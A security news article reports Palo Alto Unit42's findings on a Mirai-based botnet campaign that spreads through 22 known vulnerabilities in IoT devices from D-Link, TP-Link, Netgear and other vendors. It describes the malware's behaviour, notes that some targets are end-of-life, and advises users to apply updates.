Palo Alto’s Unit42 IT researchers have identified a new malware campaign that exploits vulnerabilities in Internet of Things (IoT) devices to distribute variants of the Mirai botnet. The researchers have listed a total of 22 vulnerabilities that cybercriminals can exploit to gain full access to vulnerable devices, which they then add to their botnet. This allows them to launch further attacks, such as Distributed Denial of Service (DDoS) attacks.
In March, Palo Alto’s IT security researchers discovered a shell downloader that was downloading and running various bot clients supporting different processor architectures. The Unit42 researchers found clients for various ARM dialects, MIPS, SH4, x86, x86_64, ARC, m68k, and Sparc. In April, a second campaign reloaded the same shellcode downloader, and the botnet clients were almost identical, leading analysts to believe it is the same group of cybercriminals behind both campaigns.
The malware campaign has continuously added new exploits, allowing the attackers to target more routers and turn them into drones for their botnet. According to the researchers, based on the behavior and patterns observed, the malware variants are believed to be related to the Mirai botnet. When the malware is executed, it displays the message “listening tun0” on the console and ensures that only one instance is running on the device. If a botnet process already exists, the client terminates it and starts a new one.
Unlike other Mirai variants, the examined malware does not contain functions for brute force attacks or abusing vulnerabilities in Telnet or SSH logins. Instead, it spreads through the attempts of the botnet operator. The Unit42 analysis also provides a list of indications of infections (Indicators of Compromise, IOCs), as well as the vulnerabilities and affected devices or software.
Devices from APsystems, Arris, D-Link, Flir, Intelbras, Mediatek, Netgear, Telesquare, Tenda, TP-Link, and software such as Engenius Enshare, MVPower, Nagios, Nortek Linear eMerge, Solarview, Vacron, or ZeroShell are among the targets of the attacker. General CCTV/DVR products are also being targeted. Some of the affected devices have reached end-of-life, meaning they no longer receive updates to address the vulnerabilities. The manufacturer D-Link has announced that users of affected devices that have reached end-of-life or end-of-service can receive new replacement devices at a reduced price in the US.
The Mirai botnet was last observed in April last year, where cybercriminals exploited a vulnerability called Spring4Shell to infect devices. Users of devices and software from the affected brands should check if their devices appear on the list and install any available security updates.
